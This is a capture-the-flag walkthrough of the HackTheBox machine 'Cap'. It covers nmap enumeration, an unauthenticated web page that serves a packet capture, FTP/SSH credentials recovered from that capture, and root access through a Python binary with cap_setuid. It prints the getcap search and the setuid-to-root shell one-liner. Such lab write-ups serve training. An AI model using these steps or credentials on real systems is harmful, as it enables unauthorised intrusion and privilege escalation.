This box is classified as easy, but we at CovertBay decided to classify it as super easy, thanks to InfosecJack on HackTheBox. Since the web application page did not have any kind of authentication and allowed us to download packet capture files (.pcap) where when analyzed; reveals a FTP username and password which is also the credentials for SSH. Once logged in, as this box’s name suggests, the privilege escalation path is via Linux capabilities.
Phase 1 - Enumeration
As usual, we start off with a nmap to identify open ports.
PORT STATE SERVICE VERSION 21/tcp open ftp vsftpd 3.0.3 22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.2 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 3072 fa:80:a9:b2:ca:3b:88:69:a4:28:9e:39:0d:27:d5:75 (RSA) | 256 96:d8:f8:e3:e8:f7:71:36:c5:49:d5:9d:b6:a4:c9:0c (ECDSA) |_ 256 3f:d0:ff:91:eb:3b:f6:e1:9f:2e:8d🇩🇪b3🇩🇪b2:18 (ED25519) 80/tcp open http gunicorn | fingerprint-strings: | FourOhFourRequest: | HTTP/1.0 404 NOT FOUND | Server: gunicorn | Date: Tue, 09 Nov 2021 19:10:40 GMT | Connection: close | Content-Type: text/html; charset=utf-8 | Content-Length: 232 | <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN"> | <title>404 Not Found</title> | <h1>Not Found</h1> | <p>The requested URL was not found on the server. If you ...[snip]...
We see three ports opened: (i) FTP (ii) SSH (iii) HTTPd (gunicorn)
Navigating to the webpage on port 80, we right away get a dashboard, which is odd; because usually there would be a login of some kind.
Navigating to the sidebar of the dashboard, we notice “Security Snapshot”:
This /data page allows us to download packet capture files, where we can analyze network traffic through Wireshark. Playing with the ID numbers of /data, we find a pcap that’s higher in packets captured than the rest on /data/0; let’s download and analyze it.
Phase 2 - Exploitation
PCAP Analysis with Wireshark
Opening the packet capture file in Wireshark to analyze:
Analyzing the .pcap file, we find FTP credentials:
username: nathan password: Buck3tH4TF0RM3!
Since we know this is FTP credentials, and we have SSH running, too; let’s try it on SSH before FTP. And it works, we get in as the user nathan and get the user flag.
Phase 3 - Privilege Escalation
Linux capabilities provide a subset of the available root privileges to a process.
So, let’s run getcap to recursively search for the capabilities we have as the user nathan:
[email protected]:~$ getcap -r / 2>/dev/null /usr/bin/python3.8 = cap_setuid,cap_net_bind_service+eip /usr/bin/ping = cap_net_raw+ep /usr/bin/traceroute6.iputils = cap_net_raw+ep /usr/bin/mtr-packet = cap_net_raw+ep /usr/lib/x86_64-linux-gnu/gstreamer1.0/gstreamer-1.0/gst-ptp-helper = cap_net_bind_service,cap_net_admin+ep [email protected]:~$
We notice Python right off the bat; which means we can simply run a Python command to give us a shell:
[email protected]:~$ /usr/bin/python3.8 -c 'import os; os.setuid(0); os.system("/bin/bash")' [email protected]:~# id uid=0(root) gid=1001(nathan) groups=1001(nathan) [email protected]:~#
And we have rooted the box. This box maybe easy, but good practice to remember privilege escalation techniques with Linux capabilities.